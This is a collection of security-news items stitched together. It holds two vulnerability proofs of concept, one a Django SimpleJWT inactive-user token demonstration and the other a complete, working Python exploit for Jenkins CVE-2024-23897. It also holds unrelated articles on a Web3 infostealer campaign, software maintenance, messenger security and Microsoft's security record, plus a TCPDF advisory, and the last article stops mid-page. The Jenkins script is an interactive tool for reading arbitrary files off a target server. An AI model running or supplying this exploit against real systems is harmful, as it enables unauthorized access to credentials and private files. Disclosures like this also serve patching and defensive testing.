Django REST Framework SimpleJWT versions 5.3.1 and below suffer from an information disclosure vulnerability.

    # Exploit Title: djangorestframework-simplejwt 5.3.1 - Information Disclosure# Date: 26/01/2024# Exploit Author: Dhrumil Mistry (dmdhrumilmistry)# Vendor Homepage: https://github.com/jazzband/djangorestframework-simplejwt/# Software Link:https://github.com/jazzband/djangorestframework-simplejwt/releases/tag/v5.3.1# Version: <= 5.3.1# Tested on: MacOS# CVE : CVE-2024-22513# The version of djangorestframework-simplejwt up to 5.3.1 is vulnerable.# This vulnerability has the potential to cause various security issues,# including Business Object Level Authorization (BOLA), Business Function# Level Authorization (BFLA), Information Disclosure, etc. The vulnerability# arises from the fact that a user can access web application resources even# after their account has been disabled, primarily due to the absence of proper# user validation checks.# If a programmer generates a JWT token for an inactive user using`AccessToken`# class and `for_user` method then a JWT token is returned which canbe used for# authentication across the django and django rest framework application.# Start Django Shell using below command:# python manage.py shell# ----------------------------------------# Create inactive user and generate token for the userfrom django.contrib.auth.models import Userfrom rest_framework_simplejwt.tokens import AccessToken# create inactive userinactive_user_id = User.objects.create_user('testuser','test@example.com', 'testPassw0rd!', is_active=False).id# django application programmer generates token for the inactive userAccessToken.for_user(User.objects.get(id=inactive_user_id))  # errorshould be raised since user is inactive# django application verifying user tokenAccessToken.for_user(User.objects.get(id=inactive_user_id)).verify() #no exception is raised during verification of inactive user token

Django REST Framework SimpleJWT 5.3.1 Information Disclosure

Jenkins version 2.441 suffers from a local file inclusion vulnerability.

# Exploit Title: Jenkins 2.441 - Local File Inclusion  
# Date: 14/04/2024  
# Exploit Author: Matisse Beckandt (Backendt)  
# Vendor Homepage: https://www.jenkins.io/  
# Software Link: https://github.com/jenkinsci/jenkins/archive/refs/tags/jenkins-2.441.zip  
# Version: 2.441  
# Tested on: Debian 12 (Bookworm)  
# CVE: CVE-2024-23897

from argparse import ArgumentParser  
from requests import Session, post, exceptions  
from threading import Thread  
from uuid import uuid4  
from time import sleep  
from re import findall

class Exploit(Thread):  
  def __init__(self, url: str, identifier: str):  
    Thread.__init__(self)  
    self.daemon = True  
    self.url = url  
    self.params = {"remoting": "false"}  
    self.identifier = identifier  
    self.stop_thread = False  
    self.listen = False

  def run(self):  
    while not self.stop_thread:  
      if self.listen:  
        self.listen_and_print()

  def stop(self):  
    self.stop_thread = True

  def receive_next_message(self):  
    self.listen = True

  def wait_for_message(self):  
    while self.listen:  
      sleep(0.5)

  def print_formatted_output(self, output: str):  
    if "ERROR: No such file" in output:  
      print("File not found.")  
    elif "ERROR: Failed to parse" in output:  
      print("Could not read file.")

    expression = "No such agent \"(.*)\" exists."  
    results = findall(expression, output)  
    print("\n".join(results))

  def listen_and_print(self):  
    session = Session()  
    headers = {"Side": "download", "Session": self.identifier}  
    try:  
      response = session.post(self.url, params=self.params, headers=headers)  
    except (exceptions.ConnectTimeout, exceptions.ConnectionError):  
      print("Could not connect to target to setup the listener.")  
      exit(1)

    self.print_formatted_output(response.text)  
    self.listen = False

  def send_file_request(self, filepath: str):  
    headers = {"Side": "upload", "Session": self.identifier}  
    payload = get_payload(filepath)  
    try:  
      post(self.url, data=payload, params=self.params, headers=headers, timeout=4)  
    except (exceptions.ConnectTimeout, exceptions.ConnectionError):  
      print("Could not connect to the target to send the request.")  
      exit(1)

  def read_file(self, filepath: str):  
    self.receive_next_message()  
    sleep(0.1)  
    self.send_file_request(filepath)  
    self.wait_for_message()

def get_payload_message(operation_index: int, text: str) -> bytes:  
  text_bytes = bytes(text, "utf-8")  
  text_size = len(text_bytes)  
  text_message = text_size.to_bytes(2) + text_bytes  
  message_size = len(text_message)

  payload = message_size.to_bytes(4) + operation_index.to_bytes(1) + text_message  
  return payload

def get_payload(filepath: str) -> bytes:  
  arg_operation = 0  
  start_operation = 3

  command = get_payload_message(arg_operation, "connect-node")  
  poisoned_argument = get_payload_message(arg_operation, f"@{filepath}")

  payload = command + poisoned_argument + start_operation.to_bytes(1)  
  return payload

def start_interactive_file_read(exploit: Exploit):  
  print("Press Ctrl+C to exit")  
  while True:  
    filepath = input("File to download:\n> ")  
    filepath = make_path_absolute(filepath)  
    exploit.receive_next_message()

    try:  
      exploit.read_file(filepath)  
    except exceptions.ReadTimeout:  
      print("Payload request timed out.")

def make_path_absolute(filepath: str) -> str:  
    if not filepath.startswith('/'):  
      return f"/proc/self/cwd/{filepath}"  
    return filepath

def format_target_url(url: str) -> str:  
  if url.endswith('/'):  
    url = url[:-1]  
  return f"{url}/cli"

def get_arguments():  
  parser = ArgumentParser(description="Local File Inclusion exploit for CVE-2024-23897")  
  parser.add_argument("-u", "--url", required=True, help="The url of the vulnerable Jenkins service. Ex: http://helloworld.com/")  
  parser.add_argument("-p", "--path", help="The absolute path of the file to download")  
  return parser.parse_args()

def main():  
  args = get_arguments()  
  url = format_target_url(args.url)  
  filepath = args.path  
  identifier = str(uuid4())

  exploit = Exploit(url, identifier)  
  exploit.start()

  if filepath:  
    filepath = make_path_absolute(filepath)  
    exploit.read_file(filepath)  
    exploit.stop()  
    return

  try:  
    start_interactive_file_read(exploit)  
  except KeyboardInterrupt:  
    pass  
  print("\nQuitting")  
  exploit.stop()

if __name__ == "__main__":  
  main()

Jenkins 2.441 Local File Inclusion

A Russian-language cyberattack campaign impersonates legitimate game operations to spread various cross-platform infostealers.

Source: Stockphoto Graph via Shutterstock

A Russian threat actor is peppering game developers with fraudulent Web3 gaming projects that drop multiple variants of infostealers on both MacOS and Windows devices.

The ultimate goal of the campaign appears to be defrauding victims and stealing their cryptocurrency wallets, according to Recorded Future's Insikt Group, which discovered the malicious activity.

The extensive Russian-language campaign mimics legitimate projects by using slight alterations in project names and branding — even going so far as to have multiple fake social-media accounts impersonating the projects to make them seem authentic, according to a report published online.

In the attack, the main webpage of a project offers or links to installation files for the purported "game" software, ostensibly for use by developers. However, these files instead deliver either Atomic macOS Stealer for Intel- or ARM-based devices; Rhadamanthys; or RisePro, depending on the victim's operating system.

"The targeted nature of this campaign suggests that threat actors may perceive Web3 gamers as having a more acute vulnerability to social engineering, due to an assumed trade-off in cyber hygiene — meaning that Web3 gamers may have fewer protections in place against cybercrime — in the pursuit of profit," according to the report.

That profit comes in the form of cryptocurrency, as the actor is primarily targeting developers' crypto wallets with the intent of compromising those wallets. Web3 gaming refers to online games such as Axie Infinity and MixMob that are built on blockchain technology, which can result in financial gain for players who earn various cryptocurrencies.

"As wallet compromise continues to be the biggest threat in both Web3 and cryptocurrency security … we assess that wallet compromise is likely the end goal of this campaign," according to Insikt Group. Attackers also can use credentials harvested from the malicious activity "for an array of unauthorized account accesses," according to the report.

Indeed, the report outlines several social media reports of game developers falling victim to the scam and having their crypto wallets drained, including one who lost about 2.5 Ethereum, or about $8,000.

**Setting a Trap Through Impersonation**

The attack campaign comes in the form of what's called "trap phishing," whereby malicious actors duplicate and deploy Web3 project lookalikes.

Insikt researchers began investigating the malicious activity after Web3 smart contract auditor CertiK described a project in January called Astration that used fake job openings and non-fungible token NFT offerings to lure game developers into a trap-phishing campaign that spread infostealers.

The fraudulent project duplicated and recreated nearly all of the social media accounts associated with a legit project called Alteration, including reposting social-media content from legitimate accounts, establishing a direct copy of the project's Discord server, and delivering two types of malware.

Upon further research, Insikt found five additional fraudulent gaming projects, three of which were serving malicious files communicating with the same command-and-control (C2) server as those obtained from the Astration project, as well as two that were no longer active but were found to be similar to the active scams. Purported game names associated with the active projects were ArgonGame, DustFighter, and CosmicWay Reboot, while games associated with the inactive projects were Crypterium World and Myth Island.

Overall, the threat actors are delivering the campaign via "a resilient infrastructure, allowing them to quickly adapt by rebranding or shifting focus upon detection," according to Insikt.

**Maintain Vigilance to Mitigate Risk**

Insikt highlighted the necessity for both individuals and organizations to maintain continuous vigilance against threats and adopt mitigation strategies against campaigns that use phishing as an initial entry point. To that end, the group offered a number of mitigations in its report as well as included a list of indicators of compromise.

One is to provide comprehensive training to users — especially those involved in Web3 gaming or related industries — to recognize social engineering tactics associated with trap phishing. Game developers in particular should "scrutinize the legitimacy of Web3 projects advertised on social media," according to the report.

Organizations also should educate users on the well-known risks associated with downloading software from unverified sources and the importance of verifying the authenticity of project websites before installation.

Endpoint protection solutions updated with the latest threat intelligence — such as antivirus software that are capable of detecting and blocking known infostealer variants like Atomic, Stealc, Rhadamanthys, and RisePro — also can help organizations avoid compromise.

Organizations should also deploy multi-platform security measures to protect against malware infections across both macOS and Windows devices, including firewalls, intrusion detection systems, and endpoint detection and response (EDR) solutions, according to Insikt.

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Web3 Game Developers Targeted in Crypto Theft Scheme

By Owais Sultan
Explore the significance of software support in the fast-paced digital world. Discover how continuous maintenance, bug fixing, feature enhancement, and integration management optimize operations. With expert assistance, enhance security, ensure project continuity, and improve processes for operational excellence
This is a post from HackRead.com Read the original post: Software Support: 7 Essential Reasons You Can’t Overlook

Software technology is driving innovation in the fast-changing digital world. Companies worldwide need excellent software support to achieve operational excellence and competitive differentiation. Agile software solutions enhance operations and help firms adapt to market changes.

Modern organizations require skilled software assistance to manage their complex processes and provide seamless operational flows, data integrity, and an employee- and customer-friendly interface. The predictive maintenance software sector is expected to reach $18,551 million by 2028, according to Fortune Business Insights (2023). Here, digital solutions are being used to streamline operations and reduce costly downtime.

****The Significance of Software Maintenance****

The importance of maintenance and support software are highlighted below:

1.  Continuous Maintenance. To keep up with the ever-evolving technical and commercial environments, software, like any other operational aspect, requires continuous maintenance. To keep the program running smoothly and free of errors, performance concerns, and out-of-date features, regular maintenance is essential.

2.  **Eliminating Bugs:** Fixing bugs is an important part of software maintenance. Finding and fixing bugs in code, hardware, or the operating system without disrupting current functionality is what it’s all about. For the program to function properly and provide the promised benefit, this step is critical.

3.  **Enhancing Capabilities**: Keeping software up-to-date with new features and functionalities keeps it compatible with changing market conditions. Improving platforms and other process components is possible. Businesses may stay ahead by enhancing their skills. 

4.  **Eliminating Obsolete Features:** Some features get stale and may reduce program performance as time goes on. Software needs to update old features with new, modern ones using the latest tools and technologies to stay useful and efficient.

5.  **Enhancing Performance**: The cornerstone of enhancing system performance is implementing regular testing and resolving issues. These activities include data restructuring and coding to safeguard the application against vulnerabilities and hackers.

6.  **Integration Management:** Integration of third-party applications is common in modern software. The entire performance and stability of the product depends on these integrations working as intended, particularly following software changes.

7.  **Efficiency in spending:** Good software support reduces costs by preventing problems and improves how well a business runs, positively affecting profits.

****Software Maintenance and Support: More Than Just the Essentials****

While regular software maintenance is essential for the program’s proper functioning, there are other benefits to investing in maintenance and support:

*   Software maintenance helps keep your company secure from ever-changing cyber threats by applying security patches and updates regularly. It makes your data safer. This is of utmost importance in the modern era that is driven by data.
*   Made sure your project wouldn’t end: Disruption to corporate operations may occur as a result of unforeseen software failures. Proactive maintenance helps keep your project on time and minimizes downtime.

*   Time is saved by mature processes: In order to fix problems and install upgrades effectively, seasoned software maintenance teams have developed procedures. Your company’s internal IT resources may then be reallocated to other strategic endeavours.
*   Improving software maintenance makes adding new features simpler and cheaper, reducing update costs and time.
*   Continuous support and technical assistance from software maintenance firms prepare you for any challenges with a team of professionals.

Software maintenance may improve technology, customer service, competitiveness, and operational excellence for enterprises.

****Recap****

Strong software support for the evolving business world. Additionally, it offers various support channels like technical help and live chat customer service. This support is crucial for operational success, staying ahead of competitors, ensuring smooth user experiences, protecting data, maintaining projects, saving time, reducing costs, and solving problems with expert help.

1.  What Is Incident Management Software?
2.  Top Software Development Outsourcing Trends
3.  AI Assistants: Breakthroughs in Software Development
4.  Integrating Pay-Per-Minute Chat Software in Customer Service
5.  Exploring Software Categories: From Basics to Specialized Apps

Software Support: 7 Essential Reasons You Can’t Overlook

Imagine a world where the software that powers your favorite apps, secures your online transactions, and keeps your digital life could be outsmarted and taken over by a cleverly disguised piece of code. This isn't a plot from the latest cyber-thriller; it's actually been a reality for years now. How this will change – in a positive or negative direction – as artificial intelligence (AI) takes on

AI Copilot: Launching Innovation Rockets, But Beware of the Darkness Ahead

By Uzair Amir
Worried about prying eyes? We explain how messenger apps keep your chats confidential with features like encryption & multi-factor authentication.  Learn about security risks & emerging technologies for a safer digital future.
This is a post from HackRead.com Read the original post: Texting Secrets: How Messenger Apps Guard Your Chats

In today’s digital age, conversations are more online than face-to-face; hence, we must be careful with our messages. The widely used **messenger applications** designed for modern communication have advanced greatly in ensuring that our chat remains confidential. However, what measures are taken by such systems to keep our conversations safe from any malicious activity?

****End-to-End Encryption****

This security measure ensures that messages are decrypted only by the intended users. With end-to-end encryption, decryption is only possible by the receiver – the third party cannot intercept or **eavesdrop on the message**.

WhatsApp and Telegram are some chat applications that employ this encryption to secure user chat. Encryption of messages occurs “at the end” with the sender, and it can only be decrypted when it reaches the intended receiver “at the other end”; therefore creating a problem even for the messaging companies that would wish to decrypt and read the messages.

****Security Measures Beyond Encryption****

*   **Two-Factor Authentication (2FA):** To improve security, two-factor authentication requires users to enter a code that is sent to their mobile phone apart from the usual login details. This makes it much safer against unauthorized hackers when passwords get stolen to send **messenger hacked** links and gain access to sensitive accounts.
*   **Biometric Authentication:** Messenger applications can benefit from convenient and safe biometric authentication options like fingerprint and facial recognition. Through the use of individual biological attributes, it guarantees that only the authorized user can unlock their conversations.
*   **Secure Messaging Protocols:** Messenger applications are built on secure messaging protocols (like the Signal Protocol or the Off-the-Record Messaging protocol), enabling encrypted communication channels among different individuals. These protocols ensure that the message remains private even during any attack on the network.

****Challenges and Vulnerabilities********Phishing Attacks****

The security of messenger apps is still seriously threatened by **phishing attacks** when cybercriminals make efforts to deceive people and disclose their login details as well as other important data. Mitigation of this risk requires education as well as awareness about phishing techniques.

**Messenger app security** is also at risk from social engineering tactics like impersonation or manipulation. People must stay alert and suspicious of any odd messages or friend requests coming from unfamiliar ones; rather, they must confirm that the sender is who they claim to be before giving out any confidential data.

****Device Security Risks****

Messenger app communication may be unsafe due to weaknesses in device security, such as malware or **insecure Wi-Fi networks**. To prevent this, it is important to have regular software updates, antivirus software and secure network connections.

****Emerging Technologies in Chat Security****

*   **Quantum Cryptography:** Quantum mechanics is used in quantum cryptography to ensure that data is stored in quantum states, resulting in high levels of safety. Although it is still being considered as an attempt, quantum cryptography provides a potential solution to secure messaging encryption.
*   **Blockchain-Based Messaging Platforms:** With blockchain technology, it becomes possible to have messaging systems which do not centralize message data but rather store it across a distributed network, making it almost impossible for someone to corrupt or prevent certain messages from passing through. The **blockchain messaging applications** enhance safety as well as confidentiality through open and unchangeable message logs.
*   **AI-Powered Threat Detection:** In messenger applications today, there is a growing trend of utilizing artificial intelligence as well as machine learning algorithms to identify and deal with security threats. These systems analyze user activities, messages exchanged, as well as network flow metadata to detect, prevent and respond immediately to any breaches of security.

****Balancing Security and Usability****

Although it is important to have strong security systems, messenger applications need to balance between security and ease of use to be convenient. The flow of messages must not be disrupted, and there should be no negative impact on user experience as a result of complicated security protocols.

****The Future of Secure Messaging****

The landscape of chat security will change with advancing technology. The security of messenger applications will be improved by developments in **encryption algorithms**, authentication mechanisms, and threat detection technologies to guarantee that our conversations remain confidential and safe within cyberspace.

To promote secure communication, it is crucial to educate people on how they can stay safe and why privacy matters. Messaging platforms take part in user awareness programs that emphasize risks posed by hackers and promote preventative security steps.

The security of our conversations is very important at a time when digital communication is dominant. Many security features are used by messaging applications such as end-to-end encryption, biometric authentication, etc., to protect our conversations against any threats.

Nonetheless, the pace at which cyber threats change and develop means that new forms of securing chats must be continuously created. To achieve this, we have to keep on guard and adopt new technologies so that our conversations will stay private and safe.

1.  Zama Secures $73M Series A Lead for Homomorphic Encryption
2.  WhatsApp Encryption Explained — “Everything is not what it seems”
3.  Encrypted Email Service ProtonMail Supports Physical Security Keys

Texting Secrets: How Messenger Apps Guard Your Chats

Microsoft has stumbled through a series of major cybersecurity failures over the past few years. Experts say the US government’s reliance on its systems means the company continues to get a free pass.

When Microsoft revealed in January that foreign government hackers had once again breached its systems, the news prompted another round of recriminations about the security posture of the world’s largest tech company.

Despite the angst among policymakers, security experts, and competitors, Microsoft faced no consequences for its latest embarrassing failure. The United States government kept buying and using Microsoft products, and senior officials refused to publicly rebuke the tech giant. It was another reminder of how insulated Microsoft has become from virtually any government accountability, even as the Biden administration vows to make powerful tech firms take more responsibility for America’s cyberdefense.

That state of affairs is unlikely to change even in the wake of a new report by the Cyber Safety Review Board (CSRB), a group of government and industry experts, which lambasts Microsoft for failing to prevent one of the worst hacking incidents in the company’s recent history. The report says Microsoft’s “security culture was inadequate and requires an overhaul.”

Microsoft’s almost untouchable position is the result of several intermingling factors. It is by far the US government’s most important technology supplier, powering computers, document drafting, and email conversations everywhere from the Pentagon to the State Department to the FBI. It is a critical partner in the government’s cyberdefense initiatives, with almost unparalleled insights about hackers’ activities and sweeping capabilities to disrupt their operations. And its executives and lobbyists have relentlessly marketed the company as a leading force for a digitally safer world.

These enviable advantages help explain why senior government officials have refused to criticize Microsoft even as Russian and Chinese government-linked hackers have repeatedly breached the company’s computer systems, according to cybersecurity experts, lawmakers, former government officials, and employees of Microsoft’s competitors.

These people—some of whom requested anonymity to candidly discuss the US government and their industry’s undisputed behemoth—argue that the government’s relationship with Microsoft is crippling Washington’s ability to fend off major cyberattacks that jeopardize sensitive data and threaten vital services. To hear them tell it, Microsoft is overdue for oversight.

**A History of Breaches and Controversy**

Microsoft has a long track record of security breaches, but the past few years have been particularly bad for the company.

In 2021, Chinese government hackers discovered and used flaws in Microsoft’s email servers to hack the company’s customers, later releasing the flaws publicly to spark a feeding frenzy of attacks. In 2023, China broke into the email accounts of 22 federal agencies, spying on senior State Department officials and Commerce Secretary Gina Raimondo ahead of multiple US delegation trips to Beijing. Three months ago, Microsoft revealed that Russian government hackers had used a simple trick to access the emails of some Microsoft senior executives, cyber experts, and lawyers. Last month, the company said that attack also compromised some of its source code and “secrets” shared between employees and customers. On Thursday, the Cybersecurity and Infrastructure Security Agency (CISA) confirmed that those customers included federal agencies, and issued an emergency directive warning agencies whose emails were exposed to look for signs that the Russian hackers were attempting to use login credentials contained in those emails.

These incidents occurred as security experts were increasingly criticizing Microsoft for failing to promptly and adequately fix flaws in its products. As by far the biggest technology provider for the US government, Microsoft vulnerabilities account for the lion’s share of both newly discovered and most widely used software flaws. Many experts say Microsoft is refusing to make the necessary cybersecurity improvements to keep up with evolving challenges.

Microsoft hasn’t “adapted their level of security investment and their mindset to fit the threat,” says one prominent cyber policy expert. “It’s a huge fuckup by somebody that has the resources and the internal engineering capacity that Microsoft does.”

The Department of Homeland Security’s CSRB endorsed this view in its new report on the 2023 Chinese intrusion, saying Microsoft exhibited “a corporate culture that deprioritized both enterprise security investments and rigorous risk management.” The report also criticized Microsoft for publishing inaccurate information about the possible causes of the latest Chinese intrusion.

The recent breaches reveal Microsoft’s failure to implement basic security defenses, according to multiple experts.

Adam Meyers, senior vice president of intelligence at the security firm CrowdStrike, points to the Russians’ ability to jump from a testing environment to a production environment. “That should never happen,” he says. Another cyber expert who works at a Microsoft competitor highlighted China’s ability to snoop on multiple agencies’ communications through one intrusion, echoing the CSRB report, which criticized Microsoft’s authentication system for allowing broad access with a single sign-in key.

“You don't hear about these types of breaches coming out of other cloud service providers,” Meyers says.

According to the CSRB report, Microsoft has “not sufficiently prioritized rearchitecting its legacy infrastructure to address the current threat landscape.”

In response to written questions, Microsoft tells WIRED that it’s aggressively improving its security to address recent incidents.

“We are committed to adapting to the evolving threat landscape and partnering across industry and government to defend against these growing and sophisticated global threats,” says Steve Faehl, chief technology officer for Microsoft’s federal security business.

As part of its Secure Future Initiative launched in November, Faehl says, Microsoft has improved its ability to automatically detect and block abuses of employee accounts, begun scanning for more types of sensitive information in network traffic, reduced the access granted by individual authentication keys, and created new authorization requirements for employees seeking to create company accounts.

Microsoft has also redeployed “thousands of engineers” to improve its products and has begun convening senior executives for status updates at least twice weekly, Faehl says.

The new initiative represents Microsoft’s “roadmap and commitments to answer much of what the CSRB report called out as priorities,” Faehl says. Still, Microsoft does not accept that its security culture is broken, as the CSRB report argues. “We very much disagree with this characterization,” Faehl says, “though we do agree that we haven’t been perfect and have work to do.”

**A Security Revenue ‘Addiction’**

Microsoft has earned special enmity from the cybersecurity community for charging its customers extra for better security protections like threat monitoring, antivirus, and user access management. In January 2023, the company touted that its security division had passed $20 billion in annual revenue.

“Microsoft has shifted to looking at cybersecurity as something that's meant to generate revenue for them,” says Juan Andrés Guerrero-Saade, associate vice president of research at security firm SentinelOne. His colleague Alex Stamos recently wrote that Microsoft’s “addiction” to this revenue “has seriously warped their product design decisions.”

These tensions exploded into the open in early 2021, as Congress and the new Biden administration scrambled to understand Russia’s far-reaching SolarWinds hacking campaign.

After breaching government networks through SolarWinds software, Moscow’s operatives fooled Microsoft’s cloud platform into granting them expansive access. Because most agencies weren’t paying for Microsoft’s premium service tier, they didn’t have the network activity logs necessary to detect these intrusions. Lawmakers were outraged that Microsoft was charging the government extra for such a basic feature, and Biden administration officials spent the next two and a half years privately urging Microsoft to make log data free for all customers. Microsoft finally agreed to do so last July—eight days after announcing yet another major hack, this one discovered by an agency paying for log data.

Microsoft won’t say if it plans to make other premium security features free for all of its customers. “We continue to raise the built-in security of our products and services to benefit customers,” Faehl says.

Asked about experts’ arguments that Microsoft’s strategy of profiting off of cybersecurity is incompatible with a security-first mindset, Faehl says, “We would disagree with that characterization.”

**A System That’s Everywhere**

Microsoft’s dominance has prompted concerns that it represents a single point of failure, concentrating America’s technology dependence in such a way that hackers could easily sabotage essential services by targeting one company’s products.

Few services better illustrate the government’s overwhelming dependence on Microsoft—and an area where some experts say a more diversified approach would be safer—than email. A former US cybersecurity official who works at one of Microsoft’s competitors predicts that an attack crippling Microsoft’s email platform would significantly reduce the government’s ability to operate.

Warnings about a Microsoft “monoculture” date back two decades, but the idea is now attracting new attention from policymakers.

“The US government’s dependence on Microsoft poses a serious threat to US national security,” says US senator Ron Wyden. “The government is effectively stuck with the company’s products, despite multiple serious breaches of US government systems by foreign hackers caused by the company’s negligence.”

Last Monday, Wyden announced draft legislation that would set a four-year deadline for the federal government to stop buying collaboration technology like Microsoft Office that critics say doesn’t integrate well with competing services.

Reducing the government’s reliance on a single vendor wouldn’t just benefit the government, experts say. It would also spread the attack risk across more companies, taking some of the pressure off of Microsoft to protect such a vast portfolio of systems. The giant target on Microsoft’s back makes it a magnet for cybercriminals and government hackers, which helps explain its outsize number of breaches.

The government’s reliance on Microsoft also entrenches a sense of familiarity with its products that cements its places in federal networks. While some agencies are exploring alternatives to Microsoft, most of them are sticking with what they know—largely because it’s easier than switching to an alternative platform, the former cyber official says.

Microsoft denies making it difficult for customers to switch to or incorporate competitors’ products. “Our competitors often stoke subjective complaints about ‘compatibility,’” Faehl says, but “we hear this more from the vendors of some third-party products” than from customers trying to use them.

Regardless, experts say, the upshot is clear: The government is dependent on Microsoft, robbing it of the leverage needed to push back on the company’s practices.

**Working the Refs**

Microsoft isn’t counting on its market dominance alone to defang government oversight. Since its antitrust battles with the government in the 1990s, the company has crafted a sophisticated public policy strategy that combines earnest calls to protect cyberspace with omnipresent participation in government initiatives.

“Microsoft is by far the slickest operation out there in tech when it comes to these issues,” says Andrew Grotto, a former senior White House cyber official who now leads Stanford University’s Program on Geopolitics, Technology, and Governance and consults for some of Microsoft’s competitors. “They learned this lesson 25 years ago and have been applying it ever since.”

Microsoft’s threat intelligence team, which knows more about malicious cyber activity than virtually any other company and most governments, regularly publishes research about cyber threats and collaborates with law enforcement on operations to dismantle hackers’ infrastructure. The company also helps fund groups like the CyberPeace Institute, which advocates for a safer internet and helps defend nongovernment organizations from hackers. And it has positioned itself as a helpful partner to policymakers who want to take on cyber issues but don’t know where to start, sometimes providing lawmakers with draft legislative language.

With its market dominance and political savvy, Microsoft has ensured that officials almost never publicly criticize it, experts say.

“The government's uncomfortable saying bad things about Microsoft because they're fully committed to them,” says Mark Montgomery, senior director of the Center on Cyber and Technology Innovation at the Foundation for Defense of Democracies, a think tank.

The Biden administration has spoken grandly about wielding the government’s formidable contracting power to force companies to improve their security. But with Microsoft, that leverage is nonexistent, experts say. “There is no realistic chance that the government will wholesale cancel its contracts with Microsoft,” Paul Rosenzweig, a cyber consultant and former DHS policy official, says in an email.

Microsoft disputes this argument. “The idea that the government is too dependent on Microsoft is at odds with reality,” Faehl says.

The government’s lack of leverage means federal officials never use the kind of blunt language found in the CSRB report when discussing Microsoft, even when they insist on speaking to reporters anonymously. The result is a remarkable display of government deference to Microsoft.

After Chinese hackers broke into government email systems and eluded agencies not paying for Microsoft’s premium security features, a senior official at CISA acknowledged that Microsoft’s business model was “not yielding the sort of security outcomes that we seek,” but they declined to directly rebuke Microsoft, instead sticking to talking points about productive conversations with the company.

In fact, despite Microsoft’s yearslong defiance of CISA’s high-profile push for companies to be “secure by design,” CISA has steadfastly refused to criticize Microsoft’s failures. When Microsoft finally bowed to pressure and made logs free last July, CISA director Jen Easterly said she was “extremely pleased with Microsoft’s decision.”

The former cyber official finds the government’s meekness remarkable. “When their own emails are stolen, they don’t seem to push back on the vendor who is the cause of that.”

The White House’s National Security Council declined to comment for this story. In a statement, Eric Goldstein, CISA’s executive assistant director for cybersecurity, says his agency “has a robust partnership with Microsoft and will continue to collaborate in many areas,” while also continuing to “impress upon all technology companies the urgency of developing products that are secure by design so that consumers can trust the safety and integrity of the technology that they use every day.”

Microsoft’s Faehl says his company is “committed to secure by design and secure by default.”

**Forcing Change**

The CSRB report on Microsoft’s cloud breach calls for dramatic changes to the company’s security culture. According to many experts, it’s time for the government to find its spine and compel those changes.

“Big, powerful companies in general don’t change their behavior unless they’re incentivized to do so,” Stanford University’s Grotto says.

The CSRB report recommends tough new requirements for cloud providers like Microsoft, including periodic security reviews after they receive federal contracts. Experts say those requirements could shift corporate incentives in favor of better security.

Microsoft seems to realize that its recent breaches have sparked a public relations crisis. “We expect and welcome fair scrutiny,” says Faehl. “As an industry leader we must be accountable for the security of our products and services.”

At the same time, he says, Microsoft “wouldn’t mind seeing some scrutiny” of its competitors who “seek to sow fear, uncertainty and doubt about our position as a way to seek advantage for their own products.”

Taking on Microsoft would also be a way for the Biden administration to live up to the principles in its National Cybersecurity Strategy, which prioritizes shifting the burden of cybersecurity onto large, well-resourced tech vendors. “They make the point … that this balance needs to shift,” Grotto says. “The question now is, ‘Okay, what does administration do with that diagnosis?’”

There are signs that the administration is heeding this advice. During a briefing with reporters on Thursday about the possibility that Russian operatives stole government secrets through their latest Microsoft hack, Goldstein said that CISA and other agencies are “are working closely with Microsoft, in alignment with the recommendations of the Cyber Safety Review Board, to drive further progress in Microsoft’s improvement plans with their broader security culture and enterprise.”

In the meantime, experts say, the status quo allows Microsoft to shirk responsibility for problems that it is uniquely capable of resolving.

“No harm comes from doing nothing, at least not to these companies,” Guerrero-Saade of SentinelOne says. “And that’s what’s going to destroy us.”

The US Government Has a Microsoft Problem

A list of topics we covered in the week of April 8 to April 14 of 2024

April 12, 2024 - Wondering whether changing your SSN is an option. Read here what you need to qualify for a new SSN and what you need to get one.

April 11, 2024 - Apple has sent alerts to people in 92 nations to say it's detected that they may have been a victim of a mercenary attack.

April 10, 2024 - Don't wait for an online harassment campaign to unfairly target you or a loved one. Take these proactive steps today to stay safe.

April 10, 2024 - Find out what sensitive data of yours is exposed online today with our new, free Digital Footprint Portal.

April 9, 2024 - A man has pleaded guilty to assuming someone else's identity for 35 years.

 A week in security (April 8 &#8211; April 14) 

TCPDF before 6.7.4 mishandles calls that use HTML syntax.

**TCPDF Cross-site Scripting vulnerability**

Moderate severity GitHub Reviewed Published Apr 15, 2024 to the GitHub Advisory Database • Updated Apr 15, 2024

GHSA-g9wg-98c2-qv3v: TCPDF Cross-site Scripting vulnerability

By Owais Sultan
Boost user engagement and SEO ranking with these key web development practices for media sites. Discover responsive design, page speed optimization, user-friendly CMS, SEO structure, and accessibility best practices.
This is a post from HackRead.com Read the original post: Best Practices for Optimizing Web Development Standards for Media Sites

Social media has permeated our lives, from interacting with loved ones to gathering information and conducting business. Consumers use their favourite websites to find products or services, but social media’s power goes beyond connecting people and businesses. It has the potential to transform all industries’ online presence and shape web development processes in highly effective ways to drive corporate growth and improve the consumer experience.

Businesses can use quality-assured code review services to eliminate memory leaks and poor performance, ensuring that everything runs smoothly while maintaining stability and security. The code review service streamlines and accelerates the software development process in ways few other approaches can.

Maintaining high web development standards for media sites is critical for providing a smooth user experience and keeping visitors engaged. Here are some of the main practices to follow:

****Responsive Design****

Responsive web design (RWD) is a web design technique that allows web pages to load efficiently on all screen sizes and resolutions while maintaining usability. It is a multi-device web approach that focuses not only on screen resolutions and screen sizes but also on overall design.

For example, you can’t just design for desktop computers; you also have to consider mobile devices to provide a better user experience. Furthermore, half of all users use mobile devices, which account for the vast majority of search engine visits.

You’ll also need to consider device resolution to ensure that all users have a seamless navigation and browsing experience.

Follow responsive design best practices to ensure that your media site is responsive and mobile-friendly, providing a seamless browsing experience across multiple platforms and screen sizes. It enables your site to adapt to different screen resolutions, resulting in higher engagement. 

****Page Load Optimization/ Page Speed****

It is a phrase that describes how quickly your content loads when a user navigates to a page on your website. This phrase is known as “page speed.” It is a measure of how long it takes for a specific page to load. Users may leave your website if the pages load slowly, reducing your chances of attracting more visitors and sales.

Another reason search engine optimization is important is that Google ranks web pages differently based on a variety of factors. Page is one of the ranking factors used on both mobile devices and desktop computers.

Furthermore, media websites frequently feature multimedia assets such as large photographs, videos, and other forms of media. To maintain high standards, page load times must be optimized. Image compression, CSS and JavaScript file minification and load time reduction can all help to improve overall performance.

****CMS Integration****

